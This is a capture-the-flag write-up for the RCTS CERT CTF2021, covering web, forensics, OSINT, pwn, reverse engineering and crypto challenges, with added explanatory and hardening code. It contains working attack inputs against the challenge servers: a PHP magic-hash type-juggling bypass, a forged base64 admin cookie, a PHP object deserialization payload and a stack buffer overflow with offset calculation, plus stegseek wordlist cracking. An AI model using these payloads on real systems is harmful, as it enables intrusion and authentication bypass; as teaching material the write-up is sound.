RCTS CERT CTF2021

Web

Some type of juggling

#web#php
Can you solve this challenge?
URL:http://challenges.defsoc.tk:8080
Flag format: flag{string}

<?php
if(isset($_GET['source'])) {
highlight_file(__FILE__);
die();
} else {
$value = "240610708";
if (isset($_GET['hash'])) {
if ($_GET['hash'] === $value) {
die('It is not THAT easy!');
}
$hash = md5($_GET['hash']);
$key = md5($value);
if($hash == $key) {
include('flag.php');
print "Congratulations! Your flag is: $flag";
} else {
print "Flag not found!";
}
}
}
?>

The two MD5 digests only have to be loosely equal (==). md5('240610708') is 0e462097431906509019562988736854, a string PHP reads as the number 0 in a loose comparison, so any other input whose digest also has the form 0e followed only by digits compares equal to it. The strict check (===) rejects nothing but the exact string 240610708, so a different value with such a "magic" digest, for example QNKCDZO (md5 0e830400451993494058024219903391), passes: var_dump(md5('240610708') == md5('QNKCDZO')); prints bool(true).
Solution

?hash=QNKCDZO
Congratulations! Your flag is: flag{php_typ3_juggl1ng_1s_c00l}
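As an added example (my code, not part of the original writeup or the challenge), the loose comparison can be reproduced outside PHP. The script below emulates PHP's == for two strings, mirrors the challenge's two checks, and scans a small numeric range for a magic hash the way such values are found in the first place. VALUE is the constant from the challenge source; every function name is mine.

```python
import hashlib
import re

# PHP's "numeric string" grammar: optional whitespace, sign, digits with an
# optional fraction, optional exponent. When both operands of == are numeric
# strings PHP compares them as numbers, and "0e<digits>" is 0 * 10^n = 0.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_eq(a: str, b: str) -> bool:
    """Emulate PHP's == between two strings (this string/string rule is
    unchanged in PHP 8; only number-vs-string comparisons were tightened)."""
    if _PHP_NUMERIC.match(a) and _PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_md5(s: str) -> bool:
    """A magic digest is '0e' followed by 30 digits: PHP treats it as 0."""
    return re.fullmatch(r"0e\d{30}", md5_hex(s)) is not None


VALUE = "240610708"  # hard-coded value from the challenge source


def challenge_accepts(hash_param: str) -> bool:
    """Mirror the challenge: strict reject of the literal value, then a loose
    comparison of the two digests."""
    if hash_param == VALUE:  # PHP ===: only the exact string is refused
        return False
    return php_loose_eq(md5_hex(hash_param), md5_hex(VALUE))


def find_magic_md5(start: int, stop: int):
    """Scan decimal strings in [start, stop) for one with a magic digest.
    About one candidate in 3e8 qualifies, so large ranges take a while."""
    for n in range(start, stop):
        if is_magic_md5(str(n)):
            return str(n)
    return None


if __name__ == "__main__":
    print(md5_hex(VALUE), md5_hex("QNKCDZO"))
    print("QNKCDZO accepted:", challenge_accepts("QNKCDZO"))
    print("magic value near the challenge's:", find_magic_md5(240610700, 240610720))
```

The regex is what decides the outcome: both digests match the numeric-string grammar, so == falls back to a float comparison in which 0e<anything> is 0.0. Comparing the digests with === (plain string equality) or hash_equals() closes the hole.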

Exclusive access

#web#owasp10
We discovered a protected page. Can you bypass it?
URL:http://challenges.defsoc.tk:9999
Flag format: flag{string}

Capturing the request shows the cookie:

Cookie: user_type=Z3Vlc3Q%3D

URL-decoding and then base64-decoding the value gives guest. Applying the inverse operations to admin gives YWRtaW4%3D; send that as the cookie value and the page returns the flag.

flag{br0k3n_auth3nt1c4t10n}
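The fix a practitioner would want to see next to this bypass, as an added example that is not the challenge's code: the first two functions reproduce the decode/encode the writeup did by hand, the last two show a cookie that carries an HMAC over the role, so a client who rewrites guest to admin is rejected. The secret and the "." separator are my choices.

```python
import base64
import hashlib
import hmac
from urllib.parse import quote, unquote


def decode_user_type(cookie_value: str) -> str:
    """What the challenge's cookie holds: URL-encoded base64 of the role."""
    return base64.b64decode(unquote(cookie_value)).decode()


def forge_user_type(role: str) -> str:
    """Inverse of decode_user_type: the bypass payload for any role."""
    return quote(base64.b64encode(role.encode()).decode(), safe="")


# Hardened form (my design, not the challenge's): the role is bound to a
# server-side secret with an HMAC-SHA256 tag, "<base64 role>.<hex tag>".
def sign_user_type(role: str, secret: bytes) -> str:
    body = base64.b64encode(role.encode()).decode()
    tag = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return quote(body + "." + tag, safe="")


def verify_user_type(cookie_value: str, secret: bytes):
    """Return the role if the tag verifies, else None. Constant-time compare so
    the tag cannot be guessed byte by byte."""
    try:
        body, tag = unquote(cookie_value).rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return base64.b64decode(body).decode()


if __name__ == "__main__":
    print(decode_user_type("Z3Vlc3Q%3D"), forge_user_type("admin"))
    secret = b"server-side-secret"
    cookie = sign_user_type("guest", secret)
    print(cookie, verify_user_type(cookie, secret))
    print(verify_user_type(cookie.replace("Z3Vlc3Q", "YWRtaW4"), secret))
```

Encoding is not authentication: a base64 role is attacker-controlled input. Signing it is the minimum; a server-side session keyed by an opaque random ID avoids trusting the client for the role at all.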

It is Magic after all

#web#php
Can you do some magic in this page?
URL:http://challenges.defsoc.tk:3000
Flag format: flag{string}

<?php 
include "flag.php";

class Magic {
public $key;

public function doMagic() {
if ($this->key === true) {
global $flag;
echo $flag;
}
else {
echo "Nothing...";
}
}
}

if (isset($_GET['magic'])) {
$magic = unserialize($_GET['magic']);
$magic->doMagic();
} else {
print "Nothing...";
}

?>

exp

<?php 

class Magic {
public $key=true;
}

$a = new Magic();
echo serialize($a);

?>

Payload:

?magic=O:5:"Magic":1:{s:3:"key";b:1;}
#flag{php_d3s3r14l1z4t10n_3xpl01ts}

Forensics

Hiding in plain sight

#forensics#images
I think there is something fishy about this image.
Can you help me out?
Flag format: flag{string}

Opening the image in 010 Editor, the flag sits in plain text at the very end of the file, appended after the image data.

flag{h1dd3n_t3xt_1n_pl41ns1ght}

Welcome to the challenge

#forensics#images
Welcome to the RCTS Challenge!
Can you find the flag?
Flag format: flag{string}

Run foremost directly on the image to carve out the files embedded in it:

flag{0n3_1m4g3_1s_n0t_3n0ugh}
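Both forensics challenges above come down to bytes that sit outside the first image: text appended after the EOI marker, and a second image after the first. As an added example that is not from the writeup, the functions below do by hand what 010 Editor and foremost showed: return the trailer after the first EOI, carve every SOI..EOI span, and grep for the flag pattern. SAMPLE is a constructed JPEG-like byte string built here for the demo, not a decodable picture and not the challenge file.

```python
import re

SOI = b"\xff\xd8\xff"   # Start Of Image, followed by the next marker's 0xFF
EOI = b"\xff\xd9"       # End Of Image


def trailing_data(buf: bytes) -> bytes:
    """Everything after the first EOI. A well-formed JPEG ends there, so any
    bytes beyond it are appended payload (what 010 Editor shows at the end)."""
    end = buf.find(EOI)
    return b"" if end == -1 else buf[end + len(EOI):]


def carve_jpegs(buf: bytes):
    """Naive SOI..EOI carver, the same idea foremost applies with its jpg
    signature. Returns every span found, including files after the first."""
    found, pos = [], 0
    while True:
        start = buf.find(SOI, pos)
        if start == -1:
            break
        end = buf.find(EOI, start + len(SOI))
        if end == -1:
            break
        found.append(buf[start:end + len(EOI)])
        pos = end + len(EOI)
    return found


def find_flags(buf: bytes, pattern: bytes = rb"flag\{[^}]*\}"):
    """Flag-format strings anywhere in the buffer, as text."""
    return [m.decode("ascii", "replace") for m in re.findall(pattern, buf)]


def _fake_jpeg(tag: bytes) -> bytes:
    # Constructed minimal JPEG-like blob: SOI, one APP0 segment carrying `tag`,
    # then EOI. Enough for the marker logic, not a real image.
    body = b"JFIF\x00" + tag
    return SOI + b"\xe0" + (len(body) + 2).to_bytes(2, "big") + body + EOI


SAMPLE = _fake_jpeg(b"cover") + b"flag{c0nstructed_tr41ler}" + _fake_jpeg(b"second")


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    print("trailer:", trailing_data(data)[:64])
    print("carved images:", len(carve_jpegs(data)))
    print("flags:", find_flags(data))
```

Caveat: EXIF thumbnails carry their own SOI/EOI pair inside an APP1 segment, so on a real camera photo this naive carver returns the thumbnail as a separate hit; foremost behaves the same way, which is why it often yields more files than you expect.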

About us

#forensics#pdfs
This challenge is about the RCTS CERT at FCCN.
Can you get the flag?
Flag format: flag{string}

Look at it with strings:

└─$ strings RCTSCERT-FCCN.pdf | grep flag
<pdfx:Flag>flag{4b0ut_us_4t_rcts_c3rt}</pdfx:Flag>

Keyp it universal

#forensics#pcap
We intercepted a strange communication which we believe has important information inside.
Can you retrieve the information from it?
Flag format: flag{string}
Regex: flag{[0-9a-z_]+}

USB keyboard traffic. Dump the HID reports with tshark; the second form drops the blank lines produced by packets that carry no capdata:

tshark -r capture.pcap -T fields -e usb.capdata > usbdata.txt

tshark -r capture.pcap -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt

Insert colons between the bytes (newer tshark versions already print usb.capdata as colon-separated bytes, in which case this step can be skipped):

# Turn each usb.capdata line into colon-separated bytes, keeping only the
# 8-byte keyboard reports (16 hex chars); 4-byte mouse reports (8 hex chars)
# and blank lines are dropped.
with open('usbdata.txt', 'r') as f, open('out.txt', 'w') as fi:
    for line in f:
        a = line.strip()
        if not a:
            continue
        if len(a) == 16:  # keyboard report: 8 bytes; mouse report: 4 bytes
            fi.write(':'.join(a[i:i + 2] for i in range(0, len(a), 2)) + '\n')

keyboard.py

normalKeys = {
"04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
"09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
"0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
"13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
"18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
"1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
"22":"5", "23":"6","24":"7","25":"8","26":"9",
"27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",
"2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
"32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",
"38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",
"3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",
"44":"<F11>","45":"<F12>"}
shiftKeys = {
"04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
"09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
"0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
"13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
"18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
"1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
"22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
"28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",
"2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"",
"34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
"3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
"41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('out.txt')
for line in keys:
try:
if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
continue
if line[6:8] in normalKeys.keys():
output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
else:
output += ['[unknown]']
except:
pass

keys.close()

flag=0
print("".join(output))
for i in range(len(output)):
try:
a=output.index('<DEL>')
del output[a]
del output[a-1]
except:
pass

for i in range(len(output)):
try:
if output[i]=="<CAP>":
flag+=1
output.pop(i)
if flag==2:
flag=0
if flag!=0:
output[i]=output[i].upper()
except:
pass

print ('output :' + "".join(output))

Result:

┌──(kali㉿kali)-[~/桌面]
└─$ python keyboard2.py capture.pcap
flagusbp4ck3tc4ptur31sfun
output :flagusbp4ck3tc4ptur31sfun

Final flag:

flag{usb_p4ck3t_c4ptur3_1s_fun}
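A single decoder for the whole procedure above (tshark dump, colon insertion and keyboard.py), as an added example that is not the original script: it accepts usb.capdata lines with or without colons, skips 4-byte mouse reports and key-release reports, honours both shift modifiers (0x02 and 0x20; the script above only accepts the left one), toggles Caps Lock, and applies Backspace while it replays. SAMPLE_REPORTS is a constructed sequence of reports spelling a made-up flag, not data from the challenge pcap.

```python
import re

# USB HID boot-keyboard usage IDs -> (unshifted, shifted) characters.
_LETTERS = {0x04 + i: (chr(ord("a") + i), chr(ord("A") + i)) for i in range(26)}
_DIGITS = dict(zip(range(0x1E, 0x28), zip("1234567890", "!@#$%^&*()")))
_PUNCT = {
    0x2C: (" ", " "), 0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x2F: ("[", "{"),
    0x30: ("]", "}"), 0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'),
    0x35: ("`", "~"), 0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
}
HID_KEYS = {**_LETTERS, **_DIGITS, **_PUNCT}
KEY_ENTER, KEY_BACKSPACE, KEY_CAPSLOCK = 0x28, 0x2A, 0x39
SHIFT_MASK = 0x02 | 0x20  # left shift | right shift bits of the modifier byte


def parse_report(line: str):
    """One usb.capdata value ('0200090000000000' or '02:00:09:00:00:00:00:00')
    -> (modifiers, first keycode). None for blank lines and non-8-byte
    (e.g. mouse) reports."""
    hexstr = re.sub(r"[^0-9a-fA-F]", "", line)
    if len(hexstr) != 16:
        return None
    report = bytes.fromhex(hexstr)
    return report[0], report[2]


def decode_keystrokes(lines) -> str:
    """Replay boot-keyboard reports into the text that was typed. Only the
    first keycode slot is used; release reports (keycode 0) are skipped."""
    typed, caps = [], False
    for line in lines:
        parsed = parse_report(line)
        if parsed is None:
            continue
        mods, code = parsed
        if code == 0:
            continue
        if code == KEY_BACKSPACE:
            if typed:
                typed.pop()
        elif code == KEY_CAPSLOCK:
            caps = not caps
        elif code == KEY_ENTER:
            typed.append("\n")
        elif code in HID_KEYS:
            shifted = bool(mods & SHIFT_MASK)
            if caps and code in _LETTERS:   # Caps Lock inverts shift for letters only
                shifted = not shifted
            typed.append(HID_KEYS[code][1 if shifted else 0])
        else:
            typed.append("[%02x]" % code)
    return "".join(typed)


def _press(code: int, mods: int = 0):
    # A press report followed by the release report a real keyboard sends.
    return ["%02x00%02x0000000000" % (mods, code), "0000000000000000"]


# Constructed sample, not from the challenge pcap: types "flag{usb_test}" with
# one stray 's' corrected by Backspace.
SAMPLE_REPORTS = sum([
    _press(0x09), _press(0x0F), _press(0x04), _press(0x0A),   # f l a g
    _press(0x2F, 0x02),                                        # left shift + [ -> {
    _press(0x18), _press(0x16), _press(0x05),                  # u s b
    _press(0x2D, 0x20),                                        # right shift + - -> _
    _press(0x17), _press(0x08), _press(0x16), _press(0x17),    # t e s t
    _press(0x16), _press(0x2A),                                # stray s, then Backspace
    _press(0x30, 0x02),                                        # left shift + ] -> }
], [])


if __name__ == "__main__":
    import sys
    src = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_REPORTS
    print(decode_keystrokes(src))
```

python decode.py usbdata.txt replays a real tshark dump. Using only the first keycode slot is fine for typed text; two keys held at once (6-key rollover) would only show the first, and a layout other than US would need a different table.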

Maybe the helper can help*

You might not see it, but a flag lies within.
Flag Format: flag{string}
the-jetsons-family.jpg

Following other people's writeups:

Using stegseek, the recovered passphrase is rosie:
stegseek --crack the-jetsons-family.jpg --wordlist /usr/share/dict/rockyou.txt

cat the-jetsons-family.jpg.out

cat the-jetsons-family.jpg.out | base64 -d | base64 -d

OSINT

Welcome to Lisbon!

Oh, some activists defaced a Victoria Secret’s store.
Find out which was the model whose photo was damaged.
Flag format: flag{firstname_surname}

An OSINT challenge.

welcome_to_lisbon.jpg


The challenge name tells us the store is in Lisbon, Portugal; a Google search for Victoria Secret Lisbon finds the store location.


The blurred-out face in the challenge image is this model; searching for Victoria Secret model identifies her:

Adriana Lima

flag{adriana_lima}

Mission

Something Suspicious

#mission#logging
We have detected a strange activity inside our network and managed to get some logs from it.
Can you see what happened and if there was a host compromised?
Flag format: flag{string}
ftp.log
ssh.log

ftp.log:	ZmxhZ3tzMG0zdGgxbmc=  ->  flag{s0m3th1ng
ssh.log: X3N1c3AxYzEwdXN9 -> _susp1c10us}

Final flag:

flag{s0m3th1ng_susp1c10us}
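The hunt the writeup did by eye, as detection logic over sample lines (an added example, not the challenge's logs or scripts): pull out every base64-looking token long enough not to be an ordinary word, keep the ones that decode to printable ASCII, and stitch the fragments together in log order. FTP_LOG and SSH_LOG are constructed lines that carry only the two fragments from the writeup.

```python
import base64
import re

# Candidate tokens: 16+ base64-alphabet chars plus optional padding, not glued
# to other base64 chars (so hostnames and hex IDs inside longer words are skipped).
_B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{16,}={0,2})(?![A-Za-z0-9+/=])")


def _decode_printable(token: str):
    """Strict decode; keep the result only if it is printable ASCII."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:          # binascii.Error is a ValueError
        return None
    if raw and all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


def extract_base64_strings(text: str):
    """(line_no, token, decoded) for each token that decodes to printable text."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for m in _B64_TOKEN.finditer(line):
            decoded = _decode_printable(m.group(1))
            if decoded is not None:
                hits.append((no, m.group(1), decoded))
    return hits


def recover_flag(*logs: str) -> str:
    """Concatenate the decoded fragments in the order the logs are given."""
    return "".join(d for log in logs for _, _, d in extract_base64_strings(log))


# Constructed sample logs (not the challenge files).
FTP_LOG = """\
2021-08-14 10:02:11 ftpd[2231]: USER anonymous from 10.0.0.7
2021-08-14 10:02:12 ftpd[2231]: RETR ZmxhZ3tzMG0zdGgxbmc= failed: no such file
2021-08-14 10:02:13 ftpd[2231]: QUIT
"""
SSH_LOG = """\
Aug 14 10:05:40 host sshd[2290]: Failed password for root from 10.0.0.7 port 51022 ssh2
Aug 14 10:05:44 host sshd[2290]: Invalid user X3N1c3AxYzEwdXN9 from 10.0.0.7
Aug 14 10:05:50 host sshd[2290]: Connection closed by 10.0.0.7 port 51022
"""


if __name__ == "__main__":
    for hit in extract_base64_strings(FTP_LOG) + extract_base64_strings(SSH_LOG):
        print(hit)
    print(recover_flag(FTP_LOG, SSH_LOG))
```

On real logs the same filter is a cheap first pass for encoded command lines (PowerShell -EncodedCommand is UTF-16LE, so add a second decoder for that) and for data smuggled through usernames or file names, exactly the two fields used here.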

PWN

Well hello there

#pwn#c
We initiated the development of a bot. So far it greets you by your name. Can you test it?
Access: nc challenges.defsoc.tk 22228
Flag format: flag{string}

Load the binary into IDA and look at main:

int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[76]; // [rsp+0h] [rbp-58h] BYREF
int v5; // [rsp+4Ch] [rbp-Ch]

puts("Hello there! What is your name?");
fflush(_bss_start);
v5 = 0;
gets(v4, argv);
if ( v5 )
system("cat flag.txt");
else
printf("Well, hello %s!", v4);
putchar(10);
return 0;
}

Stack buffer overflow: v4 is the 76-byte buffer at rbp-0x58 and v5 sits right above it at rbp-0xC, and gets() has no bounds check, so a name longer than 76 characters overwrites v5 with non-zero bytes and the if ( v5 ) branch runs system("cat flag.txt"). Exactly 76 characters is not enough: the NUL terminator gets() appends would land in v5's low byte and leave it zero.

└─$ ./program_local        
Hello there! What is your name?
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
flag{Waw!_Y0u_D1d!_it_^_^}


$ nc challenges.defsoc.tk 22228
Hello there! What is your name?
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
flag{buff3r_0v3rfl0w_r0cks}

My first pwn challenge as a web player.
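Where 76 comes from, as an added example that is not part of the original writeup: the two offsets are the ones in the IDA listing above (v4 at rbp-0x58, v5 at rbp-0xC); the rest is my model of the frame. simulate_gets() replays what gets() does to that frame, including the NUL it appends, which is why a name of exactly 76 characters does not open the gate.

```python
# Frame layout from the IDA listing: v4 (the gets() buffer) at [rbp-58h],
# v5 (the flag gate, an int) at [rbp-0Ch].
BUF_RBP_OFFSET = 0x58
GATE_RBP_OFFSET = 0x0C
GATE_SIZE = 4


def overflow_offset(buf_off: int = BUF_RBP_OFFSET, gate_off: int = GATE_RBP_OFFSET) -> int:
    """Bytes from the start of the buffer to the variable to clobber."""
    return buf_off - gate_off          # 0x58 - 0x0C = 76


def build_payload(length: int, filler: bytes = b"0") -> bytes:
    """Input for gets(): no newline, since gets() stops reading there. NUL
    bytes are copied, but one at the gate's position would keep v5 zero."""
    if b"\n" in filler:
        raise ValueError("gets() stops at the first newline")
    return (filler * (length // len(filler) + 1))[:length]


def simulate_gets(payload: bytes, buf_off: int = BUF_RBP_OFFSET,
                  gate_off: int = GATE_RBP_OFFSET) -> int:
    """Model the frame from v4 up to rbp as a byte array (v5 = 0, as main sets
    it), replay gets(): unbounded copy plus a terminating NUL, and return v5.
    Bytes past the frame would hit saved rbp and the return address; they are
    ignored here because the flag is printed before main returns."""
    frame = bytearray(buf_off)
    for i, byte in enumerate(payload[:buf_off]):
        frame[i] = byte
    if len(payload) < buf_off:
        frame[len(payload)] = 0        # the NUL gets() appends
    off = overflow_offset(buf_off, gate_off)
    return int.from_bytes(frame[off:off + GATE_SIZE], "little")


def flag_gate_opens(payload: bytes) -> bool:
    """The program's test: if ( v5 ) system("cat flag.txt")."""
    return simulate_gets(payload) != 0


if __name__ == "__main__":
    for n in (75, 76, 77, 213):
        print(n, hex(simulate_gets(build_payload(n))), flag_gate_opens(build_payload(n)))
```

The same arithmetic (distance from buffer start to the target, from the decompiler's rbp-relative offsets) is the first step of any stack overflow; the only thing that changes when the target is the return address instead of a flag variable is what you write at the offset.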

Reverse Engineering

You are not allowed

#reverse#c
Can you reverse this program and get us the flag?
Flag format: flag{string}

This reversing challenge is also easy: load the binary into IDA, find main and press F5; main calls sub_401242:

__int64 __fastcall main(int a1, char **a2, char **a3)
{
char s[64]; // [rsp+0h] [rbp-50h] BYREF
char *s1; // [rsp+40h] [rbp-10h]
int v6; // [rsp+4Ch] [rbp-4h]

v6 = 0;
puts("Enter the secret key : ");
fgets(s, 64, stdin);
s1 = sub_401242();
if ( !strncmp(s1, s, 0xFuLL) )
v6 = 1;
else
puts("Wrong key entered! Try again? ");
if ( v6 )
sub_401182();
putchar(10);
return 0LL;
}

Locate sub_401242 and press F5 on it as well:

char *sub_401242()
{
char v1[15]; // [rsp+9h] [rbp-27h] BYREF
char *s; // [rsp+18h] [rbp-18h]
char *dest; // [rsp+20h] [rbp-10h]
unsigned __int64 i; // [rsp+28h] [rbp-8h]

qmemcpy(v1, "Sup3rS3cr3tK3y#", sizeof(v1));
dest = (char *)malloc(4uLL);
s = (char *)malloc(0x1FuLL);
for ( i = 0LL; i <= 0xE; ++i )
{
sprintf(s, "%c", (unsigned __int8)v1[i]);
strcat(dest, s);
}
return dest;
}

The key Sup3rS3cr3tK3y# is copied into v1 and rebuilt one character at a time; strncmp compares only the first 15 bytes, which is the whole key, so typing it yields the flag. (The binary has its own bug: dest is a 4-byte malloc'd buffer that strcat grows to 15 bytes, a heap overflow, though the program still prints the flag as shown below.)

┌──(kali㉿kali)-[~/桌面]
└─$ ./program
Enter the secret key :
Sup3rS3cr3tK3y#
flag{1ntr0_t0_r3v3rs3_3ng1n33r1ng}

Crypto

A simple challenge

#crypto#encoding
We have intercepted the following message and we think it has a secret flag in it.
Can you decode it?
Flag format: flag{string}

secret_message.txt:

Vm0weE1HRXlTWGxVYTJoVllXeGFVMWx0ZEV0alZuQlhWbXQwYVUxVk5WZFpWVlUxWVZaS2RHUkVXbFpOYWtVd1dWUkdSbVF4VG5GUmJHaHBVakpvVVZkc1pEUmpNV1JIWTBWb2JGSnJTbTlXYkZaM1RVWmtXR1JIZEZOTmEzQXdWbTF3WVZaWFNuTlhiVVpoVmpOU1RGa3llRk5XTVd3MlVtMXNhVkl5WTNsV1Z6QXhaREZrVmsxWVJsWmhhelZvVld4YWNrMUdjRmhOVlhSclVteEtNVmxyWkRSWFJrcFdZa1JPVjFKc2NGUlZWRXBUVm0xS1IySkZOVk5TUlVVMQ==

exp:

import base64

data = "Vm0weE1HRXlTWGxVYTJoVllXeGFVMWx0ZEV0alZuQlhWbXQwYVUxVk5WZFpWVlUxWVZaS2RHUkVXbFpOYWtVd1dWUkdSbVF4VG5GUmJHaHBVakpvVVZkc1pEUmpNV1JIWTBWb2JGSnJTbTlXYkZaM1RVWmtXR1JIZEZOTmEzQXdWbTF3WVZaWFNuTlhiVVpoVmpOU1RGa3llRk5XTVd3MlVtMXNhVkl5WTNsV1Z6QXhaREZrVmsxWVJsWmhhelZvVld4YWNrMUdjRmhOVlhSclVteEtNVmxyWkRSWFJrcFdZa1JPVjFKc2NGUlZWRXBUVm0xS1IySkZOVk5TUlVVMQ=="
rounds = 0
while True:
    try:
        # Peel one base64 layer; stop once the text is no longer valid base64
        # (validate=True rejects the spaces and punctuation of the plaintext).
        decoded = base64.b64decode(data, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        break
    rounds += 1
    data = decoded
    print("Decode round %d: %s" % (rounds, data))
print("END")

Result:

This is a secret message: flag{3nc0d1ng_1s_n0t_3ncrypt10n!}

Roman encryption

#crypto#cipher
We intercepted an encrypted communication that was meant to be delivered to a threat actor named Julius.
Apparently his name is the key to decipher this message.
Can you decipher it?
Flag format: flag{string}

Csddk Rtdetp,
Qcghb ykt jko ykto ptmmkoq,
Ykt igh tps qcep bsy qk osisevs ykto oswgou: jdgl{5ta5q1qtq10h_1p_b3y}

Using https://quipqiup.com/ with the clue jdgl=flag:

Hello Julius, Thank you for your support, You can use this key to receive your reward: flag{5um5t1tut10n_1s_k3y}

The flag is rejected. Re-reading the challenge hint, it should be a keyed Caesar cipher; the automatic substitution solver had guessed m where the real letter is b (5um... instead of 5ub...).

Decryption site: https://www.boxentriq.com/code-breaking/keyed-caesar-cipher
Searching for Julius gives the full name Gaius Julius Caesar; using that as the key decrypts to the flag:

Niji ce uni pieebai:
Hello Julius,
Thank you for your support,
You can use this key to receive your reward: flag{5ub5t1tut10n_1s_k3y}
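The cipher done by hand, as an added example that is not part of the writeup: build the keyed alphabet, invert the mapping, and try every shift against the crib flag{. CIPHERTEXT is the three lines from the challenge; the function names are mine. With the key Gaius Julius Caesar the shift turns out to be 0, and with the bare name Julius no shift produces the crib, which is the quick way to confirm that the hint means the full name.

```python
import string

# The three ciphertext lines from the challenge.
CIPHERTEXT = (
    "Csddk Rtdetp,\n"
    "Qcghb ykt jko ykto ptmmkoq,\n"
    "Ykt igh tps qcep bsy qk osisevs ykto oswgou: jdgl{5ta5q1qtq10h_1p_b3y}"
)


def keyed_alphabet(key: str) -> str:
    """Key letters in first-seen order, then the unused letters A..Z."""
    out = []
    for ch in (key + string.ascii_uppercase).upper():
        if ch.isalpha() and ch not in out:
            out.append(ch)
    return "".join(out)


def keyed_caesar_decrypt(ciphertext: str, key: str, shift: int = 0) -> str:
    """Encryption is cipher = keyed[(plain_index + shift) % 26] over the
    standard plain alphabet; invert it, keeping case and non-letters."""
    keyed = keyed_alphabet(key)
    out = []
    for ch in ciphertext:
        if ch.isalpha():
            p = string.ascii_uppercase[(keyed.index(ch.upper()) - shift) % 26]
            out.append(p if ch.isupper() else p.lower())
        else:
            out.append(ch)
    return "".join(out)


def crack(ciphertext: str, key: str, crib: str = "flag{"):
    """Try all 26 shifts for a key; return (shift, plaintext) containing the crib."""
    for shift in range(26):
        pt = keyed_caesar_decrypt(ciphertext, key, shift)
        if crib in pt:
            return shift, pt
    return None


if __name__ == "__main__":
    print(keyed_alphabet("Gaius Julius Caesar"))
    print(crack(CIPHERTEXT, "Julius"))
    print(crack(CIPHERTEXT, "Gaius Julius Caesar"))
```

A keyed Caesar is still a monoalphabetic substitution, so frequency analysis works on it; what the key buys the solver is the ability to resolve rare letters (b versus m here) that a crib-less solver can only guess.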

Hextraordinary security

#crypto#encoding
We just found this garbage file.
Can you decode it and retrieve any useful information from it?
Flag format: flag{string}

Convert the hex to a string:

flag{h3x4d3c1m4l_4s_4n_0bfusc4t10n_t00l}

All articles on this blog, unless otherwise stated, are licensed under CC BY-SA 4.0; please credit the source when reposting.